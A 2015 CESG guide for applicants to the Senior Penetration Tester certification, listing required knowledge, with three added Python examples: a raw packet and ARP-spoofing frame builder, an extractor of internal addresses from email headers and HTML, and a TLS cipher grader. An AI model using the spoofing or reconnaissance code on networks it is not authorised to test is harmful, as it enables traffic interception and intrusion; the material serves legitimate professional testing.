Application Guidance - CCP Penetration Tester Role, Senior Level
Issue No: 1.0 April 2015
This document is for the purposes of issuing advice to UK Government, public and private sector organisations and/or related organisations. The copying and use of this
document for any other purpose, such as for training purposes, is not permitted without the prior approval of CESG.
The copyright of this document is reserved and vested in the Crown.
Document History
Version 1.0, April 2015: First issue
Purpose & Intended Readership
This document is intended as a guide on how to structure evidence when applying for certification under the CESG Certification for IA Professionals (CCP) scheme as a Penetration Tester at Senior level and includes suggestions of what you need to learn and know before applying. It complements the publications ‘CESG Certification for IA Professionals’ (reference [a]) and the CESG ‘Guidance to Certification for IA Professionals’ (reference [b]).
Executive Summary
CESG has developed a framework for certifying Information Assurance (IA) Professionals who meet competency and skill requirements for specified IA roles. The purpose of certification is to enable better matching between requirements for IA Professionals and the competence and skills of those undertaking common IA roles. The framework was developed in consultation with Government departments, academia, industry, the certification bodies and members of the CESG Listed Adviser Scheme (CLAS). The framework includes a set of IA role definitions and a certification process. This document provides guidance for applicants for certification as a CCP Penetration Tester at Senior level.
Feedback

CESG Information Assurance Standards and Guidance welcomes feedback and encourages readers to inform CESG of their opinions, positive or otherwise, in respect of the content of this document. Please email: [email protected]
Contents:
Overall Requirements for the Penetration Tester Role, Senior Level (page 3)
Key Principles (page 3)
Role Purpose (page 3)
Senior Penetration Tester – Skills Framework for the Information Age (SFIA) Responsibility Level 4 (page 4)
Role Headline Statement (page 4)
Qualifications (page 4)
Senior Penetration Tester - Headline Statement (page 4)
Knowledge Requirements – Overall Requirements (page 6)
Knowledge Requirements for the Penetration Tester Role (page 7)
Knowledge Requirements - Engagement, Legislation & Risk (page 7)
Knowledge Requirements - Core Technical Knowledge (page 9)
Knowledge Requirements - Information Gathering (page 11)
Knowledge Requirements - Networking (page 12)
Knowledge Requirements - Microsoft Windows Security Assessment (page 14)
Knowledge Requirements - UNIX Security Assessment (page 16)
Knowledge Requirements - Databases (page 18)
Knowledge Requirements - Web Technologies (page 19)
Knowledge Requirements - Physical Access & Security (page 21)
Knowledge Requirements - Web Application Security Assessment (page 22)
Skills (page 23)
Experience (page 30)
The Certification Process – next steps (page 31)
The CCP Scheme Certification Learning Cycle (page 35)
References (page 36)
Glossary (page 37)
Overall Requirements for the Penetration Tester Role, Senior Level
Key Principles
This document is intended as a guide on how to structure evidence when applying for certification as a Penetration Tester at Senior level in the CESG Certification for IA Professionals (CCP) scheme. It includes suggestions of what you need to learn and know before applying and complements the ‘CESG Certification for IA Professionals’ (reference [a]) and ‘Guidance to CESG Certification for IA Professionals’ (reference [b]) publications, for which see http://www.cesg.gov.uk/awarenesstraining/certified-professionals/Pages/index.aspx

Learning comes through acquiring skills and knowledge (from training, experience and learning from others doing the same job) and then putting these into practice. Most people will need a few years to acquire these, although in some cases this period may be longer or shorter.

The section on skills provides prompts for evidence to demonstrate that you meet the required standards. You are encouraged to follow the advice in this section when completing your written submission.
Role Purpose
Penetration testing is an independent assessment of the different elements that comprise an information system or product with the goal of finding and documenting any vulnerabilities present. The resultant report is considered together with threat reports and other information sources to derive a risk assessment that can be used to drive security improvements. The role of a Penetration Tester is to:
ensure that any testing activity is lawful, compliant with all relevant regulations and within the agreed scope
conduct technical security tests against the information system or product with the aim of identifying vulnerabilities
communicate the results of the tests at a level tailored to the audience
provide technical consultancy and recommendations to customers as to how any reported vulnerabilities could be mitigated
Senior Penetration Tester – Skills Framework for the Information Age (SFIA) Responsibility Level 4
Role Headline Statement
Enables and contributes to the successful delivery of penetration testing services
Qualifications
The following qualifications are recognised by CESG as demonstrating compliance with the Senior Penetration Tester knowledge requirements. An applicant for this role must therefore hold at least one of the following mandatory qualifications which must be valid (i.e. the qualification must not have expired) when the assessment is made by the Certification Body (CB):
Cyber Scheme Team Member
Tiger Scheme Qualified Security Team Member
CREST Registered Tester
GCHQ Senior Penetration Tester
Senior Penetration Tester - Headline Statement
scopes penetration tests accurately, allocating resources and ensuring personal compliance with relevant legislation and standards
works autonomously and under general direction, delivering accurate technical results in accordance with a scope and test plan
performs a broad range of complex penetration tests that demonstrate an analytical and systematic approach
applies knowledge of configuration errors, vulnerabilities and coding flaws to create and execute a series of tests to validate the security of a system or product
communicates penetration test results to both technical and non-technical audiences, facilitating collaboration between stakeholders where necessary. Influences peers and customers by delivering presentations, papers and reports on the results of penetration testing
understands information technology and actively maintains awareness of developments in the penetration testing and information security fields
participates in technical and/or professional development activities beyond his/her own team, sharing knowledge with colleagues to improve the penetration testing service
This diagram gives an overall picture of the different elements of Information Assurance and their interdependence. Penetration Testers need to work with others to understand the organisation’s environment and risk appetite in order to scope and influence testing. They also need effective communication skills to present their advice in a way that their clients can understand and use.
Knowledge Requirements – Overall Requirements
The following are examples of background knowledge which a Penetration Tester should maintain:
Information classification and protective markings
Risk assessment tools, techniques and methodologies, business impact levels, risk controls (preventive, detective, corrective); sources of assurance (intrinsic, extrinsic, operational)
Vulnerability detection tools
Current research trends
Applicable risk appetite and risk tolerance
Information systems engineering and development practices
What good and bad security look like and how to factor security into the system development lifecycle
Common causes of security incidents
Incident management
Common sources of information to support security incident investigation
Preservation of evidence for use in formal procedures
Local business objectives
More detail is provided in the following pages.
Knowledge Requirements for the Penetration Tester Role
Knowledge Requirements - Engagement, Legislation & Risk
Engagement Life-Cycle – understands:
the penetration testing life-cycle, from the initial client contact to the delivery of the final report and subsequent consultancy work
the structure of a penetration test, including all relevant processes and procedures
the different types of penetration test, such as infrastructure and application, white- and black-box
penetration testing methodologies, including those defined by the tester’s employer, together with recognised standards, such as those required in the CHECK Scheme
and knows how to:
articulate the benefits a penetration test will bring to a client and accurately convey the results of the penetration testing in a verbal de-brief and written report
Scoping – understands:
client requirements and can produce an accurate and adequately resourced penetration testing proposal
technical, logistical, financial and other constraints, and how to take these into account without compromising the effectiveness of the penetration test
Legal Matters – understands:
the legislation pertaining to penetration testing and can give examples of compliance/non-compliance. This legislation includes: Computer Misuse Act 1990; Data Protection Act 1998; Human Rights Act 1998; Police and Justice Act 2006; Police and Criminal Evidence Act 1984; Regulation of Investigatory Powers Act 2000; Telecommunications (Lawful Business Practice (Interception of Communications Regulations)) 2000
the impact this legislation has on the penetration testing process, the ethical issues associated with penetration testing, as well as understanding non-disclosure agreements and how to comply with their requirements
Understanding & Mitigating Risk – understands:
the risks associated with a penetration test and how these can be mitigated
the importance of availability & how the risk of a denial-of-service can be reduced
the importance of client confidentiality

Record Keeping and Reporting – understands:
the reporting requirements mandated by internal and external standards
the importance of keeping accurate and structured records during a penetration test, including the output from tools
the security requirements associated with record keeping, both during the penetration test and following the delivery of the final report

and knows how to:
write an appropriately tailored report from the information gathered during a penetration test
categorise vulnerabilities with respect to recognised methodologies

Platform Preparation – knows how to:
prepare for a penetration test with regard to the required hardware and software
ensure that all necessary hardware is available, including laptops, switches, media converters and wireless devices and that all operating systems and testing tools are relevant and up-to-date
avoid data cross-contamination, e.g. by sanitising a hard disk prior to deployment or taking an image from a master build
Knowledge Requirements - Core Technical Knowledge
IP Protocols – understands:
IPv4 and IPv6 and their associated security attributes
common IP/Ethernet protocols and their associated security attributes, including: TCP, UDP, ICMP, ARP, DHCP, DNS, CDP, HSRP, VRRP, VTP, STP and TACACS+
the security implications of using clear-text protocols, such as Telnet and FTP

File System Permissions and System Processes – understands:
how to demonstrate the manipulation of file system permissions on UNIX-like and Windows operating systems
how insecure file system permissions can be exploited to escalate privileges and/or gain further access to a host
how to find “interesting” files on an operating system, e.g. those with insecure or “unusual” permissions, or containing user account passwords
how to identify running processes on UNIX-like and Windows operating systems and exploit vulnerabilities to escalate privileges

Cryptography – understands:
cryptography and its use in a networked environment
common encrypted protocols and software applications, such as SSH, SSL, IPSEC and PGP
wireless protocols that support cryptographic functions, including: WEP, WPA, WPA2, TKIP, EAP, LEAP, PEAP and their associated security attributes and how they can be attacked
the differences between symmetric and asymmetric cryptography and can give examples of each
common cryptographic algorithms, such as DES, 3DES, RSA and AES, including their security attributes and how they can be attacked
common hash functions, such as MD5 and SHA1, including their security attributes and how they can be attacked
Message Authentication Codes (MACs) and Hashed MACs (HMACs)
Pivoting – understands:
the concept of pivoting through compromised devices
how to demonstrate pivoting through a number of devices in order to gain access to targets on a distant subnet

Using Tools and Interpreting Output – understands:
how to use a variety of tools during a penetration test, selecting the most appropriate tool to meet a particular requirement and interpret and understand the output of tools, including those used for port scanning, vulnerability scanning, enumeration, exploitation and traffic capture
Packet Generation – understands:
the different types of packets that are likely to be encountered during a penetration test
ARP spoofing and how to demonstrate this technique in a safe and reliable way
how to generate arbitrary packets, including TCP, UDP, ICMP and ARP, modifying packet parameters as required, e.g. source and destination IP addresses, source and destination ports, and TTL
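The following script is an added worked example for the Packet Generation requirements above; it is not part of the CESG guidance and is not taken from any named tool. It builds IPv4, ICMP echo, UDP and ARP reply packets byte by byte with the Python standard library only, so source and destination addresses, ports, TTL, IP ID and ARP sender fields are entirely under the tester's control, and it decodes its own output to confirm the checksums. All IP and MAC addresses are constructed sample values; the two send functions need raw-socket privilege (root or CAP_NET_RAW) and are shown but not exercised.

```python
"""Added example: craft arbitrary IPv4/ICMP/UDP packets and ARP frames with struct.

Nothing is transmitted by default: the builders return bytes, parse_ipv4() decodes
them back, and send_ipv4()/send_frame() show the raw-socket calls a tester would
make with CAP_NET_RAW. All addresses below are constructed sample values.
"""
import socket
import struct


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (IPv4, ICMP and UDP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes,
               ttl: int = 64, ident: int = 0x1234) -> bytes:
    """Fixed 20-byte IPv4 header with DF set. TTL and ID are caller-controlled,
    which is what a tester varies to map filters and fingerprint hops."""
    total_len = 20 + len(payload)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, 0x4000,
                         ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    header = header[:10] + struct.pack("!H", inet_checksum(header)) + header[12:]
    return header + payload


def build_icmp_echo(ident: int, seq: int, data: bytes = b"probe") -> bytes:
    """ICMP type 8 (echo request); the checksum covers header and data."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, inet_checksum(hdr + data), ident, seq) + data


def build_udp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """UDP with the IPv4 pseudo-header checksum (a computed 0 is sent as 0xFFFF)."""
    length = 8 + len(payload)
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 17, length)
    hdr = struct.pack("!HHHH", sport, dport, length, 0)
    csum = inet_checksum(pseudo + hdr + payload) or 0xFFFF
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def verify_udp(src: str, dst: str, udp: bytes) -> bool:
    """Recompute the UDP checksum over pseudo-header plus datagram; 0 means valid."""
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 17, len(udp))
    return inet_checksum(pseudo + udp) == 0


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply (opcode 2). Sent unsolicited with
    sender_ip = the gateway's address and sender_mac = the tester's NIC, this is
    the ARP-spoofing primitive: the target caches the false mapping. Send it at a
    slow fixed interval and restore the true mapping afterwards to keep it safe."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", 0x0806)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 2,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_ipv4(packet: bytes) -> dict:
    """Decode the fixed header and confirm the checksum verifies to zero."""
    f = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    return {"ttl": f[5], "proto": f[6], "ident": f[3], "total_len": f[2],
            "src": socket.inet_ntoa(f[8]), "dst": socket.inet_ntoa(f[9]),
            "checksum_ok": inet_checksum(packet[:20]) == 0}


def send_ipv4(packet: bytes, dst: str) -> None:
    """Needs root/CAP_NET_RAW; with IPPROTO_RAW the kernel uses our header as-is."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(packet, (dst, 0))


def send_frame(frame: bytes, iface: str) -> None:
    """Linux AF_PACKET send of a complete Ethernet frame (ARP has no IP layer)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    ping = build_ipv4("10.0.0.5", "10.0.0.1", 1, build_icmp_echo(0x42, 1), ttl=1)
    print(parse_ipv4(ping))
    frame = build_arp_reply("02:00:00:00:00:aa", "10.0.0.1", "02:00:00:00:00:bb", "10.0.0.20")
    print(len(frame), frame[12:14].hex())
```

A TTL of 1 on the echo request is the traceroute trick: the first router answers with ICMP time-exceeded, which both maps the hop and shows whether a filter in front of it passes ICMP.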
Service Identification – understands:
how to identify the network services offered by a host and state the purpose of an identified network service and determine its type and version
Fingerprinting – understands:
active and passive operating system fingerprinting techniques and how to demonstrate their use during a penetration test

Traffic Filtering and Access Control – understands:
network traffic filtering and where this may occur in a network and the devices and technology that implement traffic filtering, such as firewalls and how to advise on their configuration
how to demonstrate methods by which traffic filters can be bypassed
network access control systems, such as 802.1x and MAC address filtering and how these technologies can be bypassed
Patch Levels – understands:
how to obtain operating system patch levels on UNIX-like and Windows operating systems
Knowledge Requirements - Information Gathering
Domain Registration – understands:
the format of a WHOIS record and how to obtain such a record to derive information about an IP address and/or domain

DNS – understands:
the Domain Name Service (DNS) including queries and responses, zone transfers, and the structure and purpose of records, including: SOA, NS, MX, A, CNAME; PTR, TXT and HINFO
how to demonstrate how a DNS server can be queried to obtain the information detailed in these records and reveal other information that might reveal target systems or indicate the presence of security vulnerabilities
Web Site Analysis – understands:
how to interrogate a website to obtain information about a target network, such as the name and contact details of the network administrator

Search Engines, News Groups and Mailing Lists – understands:
how to use search engines, news groups, mailing lists and other services to obtain information about a target network, such as the name and contact details of the network administrator
Information Leakage – understands:
how to obtain information about a target network from information leaked in email headers, HTML meta tags and other locations, such as an internal network IP address
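The script below is an added worked example for the Information Leakage requirement; it is not part of the CESG guidance. It parses the Received chain and client headers of an e-mail with the standard library, keeps only addresses in internal ranges (RFC 1918, link-local, loopback) so that the sending organisation's internal relay addresses stand out from the public ones, and pulls hostnames and mail-server software versions from the same headers. A second function does the equivalent for HTML meta tags and developer comments. The message and page are constructed samples using documentation addresses and the .test domain.

```python
"""Added example: harvest internal addressing and software details leaked in
e-mail headers and in HTML. The message and page below are constructed samples."""
import ipaddress
import re
from email import message_from_string

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HOST_RE = re.compile(r"\b(?:from|by)\s+([A-Za-z0-9][A-Za-z0-9-]*(?:\.[A-Za-z0-9-]+)+)", re.I)
SOFTWARE_RE = re.compile(r"\bwith\s+((?:Microsoft|Exchange|Postfix|Sendmail|Exim)[^;\n]*)", re.I)
META_RE = re.compile(r'<meta\s+name=["\'](?:generator|author)["\']\s+content=["\']([^"\']+)["\']', re.I)
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)

# Explicit list rather than ipaddress.is_private, which also treats the
# documentation ranges (192.0.2/24, 198.51.100/24, 203.0.113/24) as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]


def internal_ips(text: str) -> set:
    """Addresses in text that belong to internal ranges; public ones are dropped."""
    found = set()
    for cand in IP_RE.findall(text):
        try:
            ip = ipaddress.ip_address(cand)
        except ValueError:          # e.g. a version string like 14.3.123.4 with an octet > 255
            continue
        if any(ip in net for net in INTERNAL_NETS):
            found.add(cand)
    return found


def extract_header_leaks(raw_message: str) -> dict:
    """Internal IPs, relay hostnames and software named in the Received chain
    and in client headers such as X-Mailer / X-Originating-IP."""
    msg = message_from_string(raw_message)
    received = "\n".join(msg.get_all("Received", []))
    ips = internal_ips(received)
    for extra in ("X-Originating-IP", "X-Sender-IP"):
        if msg.get(extra):
            ips |= internal_ips(msg[extra])
    software = {m.strip() for m in SOFTWARE_RE.findall(received)}
    if msg.get("X-Mailer"):
        software.add(msg["X-Mailer"].strip())
    return {"internal_ips": sorted(ips, key=ipaddress.ip_address),
            "relay_hosts": sorted(set(HOST_RE.findall(received))),
            "software": sorted(software)}


def extract_html_leaks(html: str) -> dict:
    """Generator/author meta tags, developer comments and any internal IPs in them."""
    return {"meta": META_RE.findall(html),
            "comments": [c.strip() for c in COMMENT_RE.findall(html)],
            "internal_ips": sorted(internal_ips(html), key=ipaddress.ip_address)}


SAMPLE_MESSAGE = """\
Received: from mail.example.test (mail.example.test [203.0.113.10])
\tby mx.provider.test with ESMTPS id 7c2d; Mon, 6 Apr 2015 09:00:00 +0100
Received: from EXCH01.corp.example.test (10.20.30.5) by mail.example.test
\t(10.20.30.9) with Microsoft SMTP Server id 14.3.123.4; Mon, 6 Apr 2015 08:59:58 +0100
Received: from [192.168.56.101] (unknown [192.168.56.101])
\tby EXCH01.corp.example.test with ESMTPSA id 9f1e
X-Originating-IP: [192.168.56.101]
X-Mailer: Microsoft Outlook 14.0
From: it-admin@example.test
To: someone@provider.test
Subject: constructed sample

body text
"""

SAMPLE_HTML = """<html><head>
<meta name="generator" content="Example CMS 3.1">
<meta name="author" content="j.smith (IT Operations)">
<!-- staging copy: reports DB at 10.20.30.7, see //intranet.corp.example.test/wiki -->
</head><body>...</body></html>"""

if __name__ == "__main__":
    print(extract_header_leaks(SAMPLE_MESSAGE))
    print(extract_html_leaks(SAMPLE_HTML))
```

From the sample the tester learns the internal Exchange hostname and address, a workstation subnet (192.168.56.0/24), the Exchange build (14.3 is Exchange 2010 SP3) and the Outlook version, all of which feed later host identification and patch-level checks.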
Banner Grabbing – understands:
how to enumerate services, their software types and versions, using banner grabbing techniques

SNMP – understands:
how to retrieve information from SNMP services and understands the MIB structure pertaining to the identification of security vulnerabilities
Knowledge Requirements - Networking
Network Architecture – understands:
network architectures and logical network diagrams
the security benefits of tiered architectures, DMZs and air-gaps
the security implications of shared media and can exploit its vulnerabilities during a penetration test

Network Routing – understands:
network routing and its associated protocols, including: RIP, OSPF, IGRP, EIGRP, BGP, EGP, IGMP
the security attributes of these protocols

Network Mapping – understands:
how to demonstrate the mapping of a network using a range of tools, such as traceroute, tcptraceroute and ping, by querying active services, such as DNS and SNMP servers
how to present the map as a logical network diagram, detailing all discovered subnets and interfaces, including routers, switches, hosts and other devices
how to accurately identify all hosts on a target network that meet a defined set of criteria, e.g. to identify all FTP servers or CISCO routers

Management Protocols – understands:
how to demonstrate the use of protocols often used for the remote management of devices including Telnet, SSH, HTTP/HTTPS, SNMP, TFTP, NTP
the security attributes of these protocols
how to demonstrate how these services can be exploited to gain access to a device or derive further information about the target network, e.g. SNMP service enumeration or the exploitation of a vulnerable CISCO HTTP server
Traffic analysis – understands:
how to intercept and monitor network traffic, capturing it to disk in a format required by analysis tools
how network traffic can be analysed to recover user account credentials and detect vulnerabilities that may lead to the compromise of a target device
Configuration Analysis – understands:
configuration files of CISCO routers and switches and can advise on how their security can be improved (most common features, such as access-lists and enabled services)
how to interpret the configuration files of other network devices, including those produced by a variety of vendors (most common features, such as access-lists and enabled services)
Routers and Switches – understands:
how to demonstrate the exploitation of vulnerabilities in routers and switches, including the use of the following protocols: Telnet, HTTP/HTTPS, TFTP, SNMP
VoIP – understands:
VoIP services, such as SIP, and can identify and fingerprint devices offering these services
Knowledge Requirements - Microsoft Windows Security Assessment
Reconnaissance – understands how to:
identify Windows hosts on a target network
identify domains, domain controllers, domain members and workgroups
enumerate accessible Windows shares

Enumeration – understands how to:
perform user and group enumeration on target systems and domains, using protocols including: NetBIOS, LDAP, and SNMP
obtain other information, such as password policies

Active Directory – understands:
Active Directory
Group Policy
Local Security Policy
user accounts and how to manipulate these accounts to gain further access to a target system, e.g. by escalating privileges from a domain user to a domain admin
Passwords – understands:
password policies, including complexity requirements and lock-out
how to avoid causing a denial-of-service by locking-out accounts
Windows password hashing algorithms and their associated security attributes
how passwords are stored and protected and can demonstrate how they can be recovered
off-line password cracking using dictionary and brute-force attacks, including the use of rainbow tables, and how to demonstrate this and the recovery of password hashes when given physical access to a Windows host
Remote Vulnerabilities – understands:
the remote exploitation of Windows operating system and third-party software application vulnerabilities and how to demonstrate this
Local Vulnerabilities – understands how to demonstrate:
the local exploitation of Windows operating system and third-party software application vulnerabilities
local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions

Post exploitation – understands how to demonstrate:
common post-exploitation activities including: password recovery, including cached credentials, lateral movement and domain compromise, the checking of operating system and third party software application patch levels
Desktop Lockdown – understands:
the concept of desktop lockdown and how to demonstrate how a user can break-out of a locked down environment

Patch Management – understands:
common patch and software management techniques and applications, including WSUS and Altiris
Knowledge Requirements - UNIX Security Assessment
Reconnaissance – understands how to:
identify UNIX hosts on a target network

Enumeration – understands how to:
perform user enumeration on target system using a variety of techniques, including remote login protocols, SMTP, finger and SNMP
perform file system enumeration on a target system, using a variety of techniques, including remote login protocols, FTP, HTTP, NFS and TFTP
enumerate RPC services & identify those with known security vulnerabilities
show awareness of legacy user enumeration techniques such as rusers and rwho

Passwords – understands:
users, groups and password policies, including complexity requirements and lock-out
how to avoid causing a denial-of-service by locking-out accounts
the format of the passwd, shadow, group and gshadow files
UNIX password hashing algorithms and their associated security attributes
how passwords are stored and protected and can demonstrate how they can be recovered
off-line password cracking using dictionary and brute-force attacks, and how to demonstrate this
how to demonstrate the recovery of password hashes when given physical access to a UNIX host

Remote Vulnerabilities – understands:
how to demonstrate the remote exploitation of Solaris & Linux operating system vulnerabilities (several key remote vulnerabilities are detailed individually within this section)
Local Vulnerabilities – understands how to demonstrate:
the local exploitation of Solaris and Linux operating system vulnerabilities
local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions
Post exploitation – understands how to:
demonstrate common post-exploitation activities including: password recovery, lateral movement, the checking of operating system and third party software application patch levels
FTP/TFTP – understands:
FTP and how to demonstrate how a poorly configured FTP server can be exploited, e.g. the downloading of arbitrary files, the uploading and over-writing of files, and the modification of file system permissions
TFTP and how to demonstrate how a poorly-configured TFTP server can be exploited, e.g. the downloading of arbitrary files, the uploading and over-writing of files
NFS – understands:
NFS and its associated security attributes, and how to demonstrate how exports can be identified
how to demonstrate how a poorly configured NFS service can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the creation of SUID-root files, the modification of files and file system permissions and UID/GID manipulation
Berkeley r-Services – understands:
the Berkeley r-services and their associated security attributes and how to demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of .rhosts and/or /etc/hosts.equiv files
SSH – understands:
SSH and its associated security attributes, including the different versions of the protocol, version fingerprinting and how the service can be used to provide a number of remote access services
how to demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of ~/.ssh/authorized_keys files
X – understands:
X and its associated security attributes, and how to demonstrate how insecure sessions can be exploited, e.g. by obtaining screen shots, capturing keystrokes and injecting commands into open terminals
Knowledge Requirements - Databases
Microsoft SQL Server – understands how to demonstrate:
the remote exploitation of Microsoft SQL server
how access can be gained to a Microsoft SQL server through the use of default account credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
following the compromise of Microsoft SQL server, how to use stored procedures to execute system commands, escalate privileges, read/write from/to the file system, and/or gain further access to a host
Oracle – understands:
how to demonstrate the remote exploitation of an Oracle database
the security attributes of the Oracle TNS Listener service
how to demonstrate how access can be gained to an Oracle database server through the use of default account credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
how the software version and patch status can be obtained from an Oracle database
following the compromise of an Oracle database server, how to use stored procedures to execute system commands, escalate privileges, read/write from/to the file system and/or gain further access to a host
Other Database Servers – understands how to demonstrate:
the remote exploitation of other common database servers, such as MySQL and PostgreSQL
how access can be gained to such a database server through the use of default account credentials and insecure passwords
how to identify and extract useful information stored within a database (e.g. user account names and passwords, recovering passwords where possible)
Knowledge Requirements - Web Technologies
Web Servers – understands:
how to identify web servers on a target network and remotely determine their type and version
how to demonstrate the remote exploitation of web servers
the purpose, operation, limitations and security attributes of web proxy servers

Protocols and Methods – understands:
how to demonstrate the use of web protocols, including HTTP, HTTPS, SOAP
all HTTP methods and response codes

Reconnaissance – understands:
the purpose of website and application reconnaissance
how to discover the structure of a website and application

Languages – understands:
common web mark-up and programming languages, including .NET, ASP, Perl, PHP, JSP, Javascript
how the insecure implementation of software developed using these languages can be exploited (candidate may select two languages)

APIs – understands how to demonstrate:
the use of web-based APIs to access remote services
how the insecure implementation of web-based APIs can be exploited

Information Gathering – understands how to:
gather information from a website and application mark-up or programming language, including: hidden form fields, database connection strings, user account credentials, developer comments, external and/or authenticated-only URLs
gather information about a website and application from the error messages it generates
Authentication – understands:
common authentication and access-control mechanism vulnerabilities, and can give examples of such vulnerabilities and of implementation best practice
Input Validation – understands:
the importance of input validation and how it can be implemented, e.g. white-lists, black-lists and regular expressions

Fuzzing – understands:
fuzzing and its use in web application testing
the generation of fuzzing strings and their potential effects, including the dangers they may introduce

XSS – understands:
cross-site scripting (XSS) and can demonstrate the launching of a successful XSS attack

Injection – understands:
injection vulnerabilities, including: code injection, SQL injection, XML injection

Blind SQL injection – understands:
blind SQL injection vulnerabilities

Sessions – understands:
how sessions are managed and can give examples of common vulnerabilities and implementation best practice

Cryptography – understands:
how cryptography can be used to protect data in transit and data at rest, both on the server and client side
the concepts of SSL and can determine whether an SSL-enabled web server has been configured in compliance with best practice (i.e. it supports only recommended ciphers and key lengths)
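The script below is an added worked example for the SSL/TLS configuration requirement above; it is not part of the CESG guidance. It grades protocol versions, OpenSSL-style cipher suite names (as returned by ssl.SSLSocket.cipher() or printed by a scanner) and certificate key sizes against current best practice, and returns the list of reasons each weak suite should be removed, which is what goes into the report. The version and suite lists in the main block are constructed scanner output; probe() is the live handshake a tester would run per protocol version and is shown but not exercised here.

```python
"""Added example: grade TLS protocol versions, cipher suites and key sizes
against current best practice. Cipher names are OpenSSL-style strings; the
live probe at the end is illustrative and is not run here."""
import re
import socket
import ssl

PROTOCOL_VERDICT = {
    "SSLv2": "obsolete, must be disabled",
    "SSLv3": "obsolete (POODLE), must be disabled",
    "TLSv1": "deprecated, disable unless a documented legacy client needs it",
    "TLSv1.1": "deprecated, disable",
    "TLSv1.2": "acceptable",
    "TLSv1.3": "acceptable",
}
MIN_KEY_BITS = {"RSA": 2048, "DSA": 2048, "DH": 2048, "EC": 256}
_SYM_BITS = re.compile(r"(?:AES|CAMELLIA|ARIA)[_-]?(\d{3})")


def assess_protocol(version: str) -> str:
    return PROTOCOL_VERDICT.get(version, "unknown version")


def key_ok(algorithm: str, bits: int) -> bool:
    """Certificate / key-exchange key size against minimum recommended lengths."""
    return bits >= MIN_KEY_BITS.get(algorithm.upper(), 2048)


def assess_cipher(name: str) -> list:
    """Return the weaknesses of one suite; an empty list means acceptable."""
    n = name.upper()
    tls13 = n.startswith("TLS_")        # TLS 1.3 suites are all AEAD with ephemeral (EC)DH
    findings = []
    if "NULL" in n:
        findings.append("NULL cipher: no encryption")
    if n.startswith("EXP"):
        findings.append("export-grade (40/56-bit) key")
    if "RC4" in n:
        findings.append("RC4 stream cipher: broken keystream biases")
    if "DES" in n:
        findings.append("DES/3DES 64-bit block (Sweet32); single DES is 56-bit")
    if n.endswith("MD5"):
        findings.append("MD5-based MAC")
    if n.startswith(("ADH", "AECDH")) or "ANON" in n:
        findings.append("anonymous key exchange: no server authentication")
    if not tls13 and not n.startswith(("ECDHE", "DHE", "EDH")):
        findings.append("no forward secrecy (static RSA/DH key exchange)")
    aead = tls13 or any(m in n for m in ("GCM", "CCM", "CHACHA20"))
    if not aead and "RC4" not in n and "NULL" not in n:
        findings.append("CBC mode with MAC-then-encrypt (padding-oracle history)")
    m = _SYM_BITS.search(n)
    if m and int(m.group(1)) < 128:
        findings.append("symmetric key under 128 bits")
    return findings


def audit(protocols, ciphers, cert_key=("RSA", 2048)) -> dict:
    """Summarise a server's offer: versions to disable, suites to remove, key size."""
    return {
        "protocols": {v: assess_protocol(v) for v in protocols},
        "bad_ciphers": {c: assess_cipher(c) for c in ciphers if assess_cipher(c)},
        "key_ok": key_ok(*cert_key),
    }


def probe(host: str, port: int = 443, version=None, timeout: float = 5.0):
    """Live check (not run here): pin one protocol version, offer everything the
    local OpenSSL can, and return what the server picks. Repeat per
    ssl.TLSVersion to map the supported range; an SSLError means refusal."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.set_ciphers("ALL:COMPLEMENTOFALL:@SECLEVEL=0")
    if version is not None:
        ctx.minimum_version = ctx.maximum_version = version
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.version(), tls.cipher()


if __name__ == "__main__":   # constructed scanner output
    print(audit(["TLSv1", "TLSv1.2"],
                ["ECDHE-RSA-AES128-GCM-SHA256", "AES256-SHA", "DES-CBC3-SHA", "EXP-RC4-MD5"],
                ("RSA", 1024)))
```

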